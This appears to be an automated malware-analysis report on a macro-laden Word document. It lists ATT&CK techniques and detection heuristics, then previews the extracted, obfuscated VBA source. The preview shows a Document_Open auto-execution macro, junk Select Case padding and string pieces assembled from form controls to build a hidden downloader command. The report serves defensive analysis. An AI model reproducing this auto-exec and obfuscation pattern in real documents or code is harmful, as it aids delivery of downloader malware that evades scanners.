MALICIOUS
262
Risk Score
Malware Insights
MITRE ATT&CK
T1059.005 Visual Basic
T1566.001 Spearphishing Attachment
T1059 Command and Scripting Interpreter
The sample contains VBA macros, including a Document_Open auto-execution macro, which is a common technique for malware delivery. The critical heuristic 'OLE_VBA_SPLIT_KEYWORD_OBFUSCATION' indicates that a dangerous API name, 'winmgmts', was reassembled from split string literals, suggesting an attempt to evade detection. The presence of a downloader heuristic and the overall structure strongly suggest this document is designed to fetch and execute a secondary payload.
Heuristics 7
-
ClamAV: Doc.Downloader.Generic-7450222-0 critical CLAMAV_DETECTIONClamAV detected this file as malware: Doc.Downloader.Generic-7450222-0
-
VBA macros detected medium 4 related findings OLE_VBA_MACROSDocument contains VBA macro code
-
Dangerous API name reassembled from split string literals critical OLE_VBA_SPLIT_KEYWORD_OBFUSCATIONVBA concatenates short string literals that reassemble a dangerous API/ProgID/LOLBin name (e.g. Scripting.FileSystemObject, WScript.Shell, powershell, URLDownloadToFile) which appears in no single literal. Splitting an API name across string concatenation is done only to evade keyword scanning.
-
Document_Open macro high OLE_VBA_DOCOPENDocument_Open macro
-
CreateObject call high OLE_VBA_CREATEOBJCreateObject call
-
VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXECCompiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
-
Embedded URL info EMBEDDED_URLOne or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)
Extracted artifacts 1
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
macros.bas |
vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 8821 bytes |
SHA-256: 6729fc00c8eab85d55821735a1ba57f0ba1336588888a836803111a6f7f2c63b |
|||
Preview scriptFirst 1,000 lines of the extracted script
Attribute VB_Name = "Pvgunbtuci"
Attribute VB_Base = "0{00020906-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
Attribute VB_Control = "Xcjexgswkuyr, 0, 0, MSForms, TextBox"
Private Sub Document_open()
Select Case Kipxwxyoms
Case Xbzrvmkyryd
ISxdk951 = AWN
FKNpk15B = 23
WPOtp5 = 2
Case 926
dLUG = Hex(UJetwZx + CDate(ywnRgL - Round(Dlbnhowskl)))
bqmax1u = 6969
QnqF67ZsD = CLng(kXja6)
Case Emaehrmap
OZb = 6532
pPcg1diH = biJruQ0
AOni9uk0 = Round(Ozwwzgumegns)
End Select
Select Case Fuhzftez
Case Twvtxmjnn
ISxdk951 = AWN
FKNpk15B = 23
WPOtp5 = 2
Case 926
dLUG = Hex(UJetwZx + CDate(ywnRgL - Round(Fstyhmflruijk)))
bqmax1u = 6969
QnqF67ZsD = CLng(kXja6)
Case Aksxgpbxbqh
OZb = 6532
pPcg1diH = biJruQ0
AOni9uk0 = Round(Arfyaeacna)
End Select
Select Case Widcdkqgrqw
Case Yomqatbnp
ISxdk951 = AWN
FKNpk15B = 23
WPOtp5 = 2
Case 926
dLUG = Hex(UJetwZx + CDate(ywnRgL - Round(Jupoyuowzn)))
bqmax1u = 6969
QnqF67ZsD = CLng(kXja6)
Case Vyzubkhzdagiu
OZb = 6532
pPcg1diH = biJruQ0
AOni9uk0 = Round(Djrchhstju)
End Select
Yftkvtrkwiz
End Sub
Attribute VB_Name = "Hqmmnmulg"
Attribute VB_Base = "0{42A26798-B370-4406-BEA3-E619CD9E3CF6}{2C76240B-0F89-4184-B23C-854AA39A3581}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False
Attribute VB_Name = "Waafqzyrjky"
Function Ubvbzxwkkql()
Select Case Phdskylqtunq
Case Eslhxfsfsloac
ISxdk951 = AWN
FKNpk15B = 23
WPOtp5 = 2
Case 926
dLUG = Hex(UJetwZx + CDate(ywnRgL - Round(Dwvsnylixw)))
bqmax1u = 6969
QnqF67ZsD = CLng(kXja6)
Case Ytpllebakvs
OZb = 6532
pPcg1diH = biJruQ0
AOni9uk0 = Round(Bjprdkwkhp)
End Select
Swpbvvoxo = Pvgunbtuci.Xcjexgswkuyr
Select Case Iwvbvzvkhokj
Case Ozjipyskf
ISxdk951 = AWN
FKNpk15B = 23
WPOtp5 = 2
Case 926
dLUG = Hex(UJetwZx + CDate(ywnRgL - Round(Dsrntyzdy)))
bqmax1u = 6969
QnqF67ZsD = CLng(kXja6)
Case Qgvzbiqnlc
OZb = 6532
pPcg1diH = biJruQ0
AOni9uk0 = Round(Cjpmjezxqwxrg)
End Select
Njzvqyppdvny = Swpbvvoxo + Hqmmnmulg.Bikrocwwbxyh + Hqmmnmulg.Vbwdbrtdh + Hqmmnmulg.Mimvysqnb
Select Case Lnffkttteoyas
Case Pwislcvpkgx
ISxdk951 = AWN
FKNpk15B = 23
WPOtp5 = 2
Case 926
dLUG = Hex(UJetwZx + CDate(ywnRgL - Round(Qzowujdhero)))
bqmax1u = 6969
QnqF67ZsD = CLng(kXja6)
Case Cjqpfxrbyzkrh
OZb = 6532
pPcg1diH = biJruQ0
AOni9uk0 = Round(Xuzmdcceabg)
End Select
Nzsabfjv = Njzvqyppdvny + Hqmmnmulg.Mjkvqfyl + Hqmmnmulg.Zxdtohfzcoeq.ControlTipText
Select Case Tjljrpvjpzvr
Case Otmgzqdwvqty
ISxdk951 = AWN
FKNpk15B = 23
WPOtp5 = 2
Case 926
dLUG = Hex(UJetwZx + CDate(ywnRgL - Round(Pfyhtaalnrv)))
bqmax1u = 6969
QnqF67ZsD = CLng(kXja6)
Case Hkimoupbesz
OZb = 6532
pPcg1diH = biJruQ0
AOni9uk0 = Round(Pxnvqtogtk)
End Select
Ubvbzxwkkql = Bsdvfezppu + Nzsabfjv + Bsdvfezppu
Select Case Njsgceeavet
... (truncated)
|
|||
Open this report in the interactive analyzer, or submit your own file for analysis.